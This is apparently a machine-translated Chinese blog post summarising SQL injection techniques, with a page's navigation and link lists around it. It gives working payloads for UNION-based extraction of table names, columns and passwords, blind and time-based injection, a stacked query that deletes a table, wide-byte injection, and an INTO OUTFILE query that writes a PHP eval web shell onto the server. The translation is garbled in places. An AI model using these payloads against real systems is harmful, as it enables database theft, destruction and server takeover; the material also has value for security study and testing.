当前位置:网站首页>Summary of SQL injection (I)
Summary of SQL injection (I)
2022-06-25 04:53:00 【Key_ Words】
The first part : Conventional injection ( The data has an echo front end )
First step : Test data types
1. Digital
id=1 and 1=1 The page is normal id=1 and 1=2 The page is not working
2. Character
id=1‘ and ’1‘=’1 The page is normal id=1‘ and ’1‘=’2 The page is not working
3. Sleep judgment ( Use when data is not echoed to the front end )
id=1' and sleep(10)--+ Page buffer 10 Seconds indicates that the judgment is correct
4. Develop common types of accepted parameters
Digital : id=$id
Character : id='$id'
Brackets + Single quotation marks : id=('$id')
Brackets + Double quotes : id=("$id")
Double brackets + Single quotation marks : id=(('$id'))
5. Note the annotation when injecting --+ and # Alternative use of
The second step : Start injecting
The following databases mysql, The data type is integer as a demonstration case
1. Guess the number of fields ( The page shows the error and normal thresholds )
?id=1 order by 4
2. Error guessing preparation
?id=-1 union select 1,2,3,4
3. information gathering
Database version : version()
Database name : database()
Database users : user()
operating system : @@version_compile_os
Database path : @@datadir perhaps @@basedir
4. Get table name ( Use the database name obtained in the previous step )
Query the specified database name dvwa The following table name information : ?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='dvwa'
5. Get column name ( Use the table name obtained in the previous step )
Query the specified table name GJC Column name information under : ?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='GJC'
6. Get data
Query the specified data in the table name :?id=1 union select 1,name,password,4 from GJC
The second part : Blind note ( Data does not echo to the front end )
1. Based on error reporting SQL Inject

2. Boolean based SQL Inject ( Pay attention to the use of dichotomy )

We construct a judgment condition ( length(database()) = 8) Judge whether the target meets the conditions , If the conditions are met, the execution is successful , If not, the execution fails .database() Is the current database name length(database()) Fetch the length of the database name < = > Are greater than 、 be equal to 、 Less than , Used to judge whether the conditions are met . To guess .
3. Based on time SQL Inject

The third part : File injection operation
Conditions of use : We need to find the absolute path of the website before using it .( Access method : Error indication , Google Syntax ,site: The target site , Legacy documents such as phpinfo, Vulnerability exposure path , Read configuration file )
1. First determine whether the filtering method is numeric or character
2. Start injecting files ( Although the page reports an error , But we have uploaded it successfully )
?id=1')) union select 1,2,3 into outfile "D:\\phpStudy\\ Other paths \\" --+
We can write a sentence directly into it
?id=1')) union select 1,2,'<?php @eval($_post["mima"])?>' into outfile "D:\\phpStudy\\ Other paths \\yijuhua.php" --+
The fourth part : Commit injection
1. Log in to the registration box SQL Inject
Judge the account number (username) Or password (password) It is better to inject
2.user-agent Inject
Get it by grabbing it http head , modify user-agent The value of the to sql Inject .
3.referer Inject
Get it by grabbing it http head , modify referer The value of the to sql Inject .
3.cookice Inject
Get it by grabbing it http head , modify referer The value of the to sql Inject .
( After the first login , preservation cookice sign out , Modify at next login cookice The value of implements injection )
The fifth part : Injection expansion
1. The secondary injection
The principle of secondary injection : When inserting data into database for the first time , Just used addslashes Or with the help of get_magic_quotes_gpc The special characters are escaped , however addslashes One feature is that although parameters will be added after filtering “\” Transference , however “\” It's not inserted into the database , The original data is still written to the database .
After storing the data into the database , Developers think the data is credible . The next time you need to query , The dirty data is directly extracted from the database , No further inspection and treatment , This will cause SQL The second injection of . For example, when inserting data for the first time , Data with single quotation marks , Directly inserted into the database ; Then in the next use, in the process of patching , A secondary injection is formed .

2. Encryption and decryption Injection
SQL Encryption and decryption injection principle : namely get perhaps post The parameters of are base64 And other encryption methods to encrypt the data , Pass the parameter to the server ,eg:www.xxx.com/index.php?id=MQ==
Encryption part :MQ==
Decryption result :1 amount to id=1
If you want to write an injection statement , The statement should be constructed first , Again base64 encryption ,
id=1 and 1=1
base64 Encryption result :MSBhbmQgMT0x
Statement for :www.xxx.com/index.php?id=MSBhbmQgMT0x
3.DNSlog Out of band query injection ( Agent pool )
Why use dnslog Inject : In general , When we can't get data directly through joint query , We can only go through blind Injection , Get data step by step , however , Use blind injection , Manual testing takes time , You might think of using sqlmap Run the data directly , But in the actual test , Use sqlmap Running blind injection , There's a good chance , The website puts your ip Seal off , This will affect our test progress , Maybe you can use a proxy pool .
4. Stack Injection
limited : Some databases support
principle :mysql Add... At the end of each statement in the command line ; End of statement . In this way, we wonder whether we can use multiple statements together .( benefits : Don't worry about encryption )
for example :select * from products where prodictid=1;delete from products
When the query is executed , The first item shows the query information , Second, delete the entire table .
5. Wide byte Injection
In the use of PHP Connect MYSQL When , When setting "setcharacter_set_client = gbk" It will cause a coding conversion problem , That is, we are familiar with wide byte injection , When there is wide byte Injection , Bring in the injection parameters % DF%27, You can put (%5C) eat , for instance .id=1%df' and 1=1%23
6. other ... ...
Be careful : The above does not consider the existence of the other party waf The condition of protection !!!
边栏推荐
- Record the problem of C # print size once
- XML (VIII)
- 计算学生成绩等级(虚函数和多态)
- 【图像融合】基于matlab方向离散余弦变换和主成分分析图像融合【含Matlab源码 1907期】
- Redis (17)
- parallel recovery slave next change & parallel recovery push change
- What if the desktop computer is not connected to WiFi
- 绝了!自动点赞,我用 PyAutoGUI!
- 【FLink】access closed classloader classloader. check-leaked-classloader
- How to download and use Xiaobai one click reload on the official website
猜你喜欢

Teach you to write non maintainable PHP code step by step

第九章 APP项目测试(2) 测试工具

Leader: who can use redis expired monitoring to close orders and get out of here!

buuctf web

多睡觉,能减肥,芝加哥大学最新研究:每天多睡1小时,等于少吃一根炸鸡腿...

为什么TCP握手刚刚好是3次呢?

Concat() in JS

great! Auto like, I use pyautogui!
![[image fusion] image fusion based on MATLAB directional discrete cosine transform and principal component analysis [including Matlab source code 1907]](/img/a1/f7a35a04e180e89d7f2fdbf89c1160.jpg)
[image fusion] image fusion based on MATLAB directional discrete cosine transform and principal component analysis [including Matlab source code 1907]

Kotlin compose listens to the soft keyboard and clicks enter to submit the event
随机推荐
My IC journey - the growth of senior chip design verification engineers - "Hu" said that IC engineers are perfect and advanced
DMA double buffer mode of stm32
Region of Halcon: generation of multiple regions (3)
Upgrade PHP to php7 X (III) failure of wechat payment callback
Mysql interactive_ Timeout and wait_ Timeout differences
Join() in JSZ
Swift rapid development
Upgrade PHP to php7 The impact of X (I). The problem of session retention. Keep login
How to download and use Xiaobai one click reload on the official website
Separation of storage and computing in Dahua cloud native database
Google Earth Engine(GEE)——全球JRC/GSW1_1/YearlyHistory数据集的批量下载(中国区域)
重磅直播 | 相移法+多频外差之数学原理推导+实现
halcon之区域:多种区域(Region)生成(3)
初识 Flutter 的绘图组件 — CustomPaint
ASEMI三相整流桥的工作原理
基于Cortex-M3、M4的精准延时(系统定时器SysTick延时,可用于STM32、ADuCM4050等)
以太网是什么要怎么连接电脑
Kotlin compose perfect todo project surface rendering background and shadow
Redis (17)
Cookie & session & JSP (XII)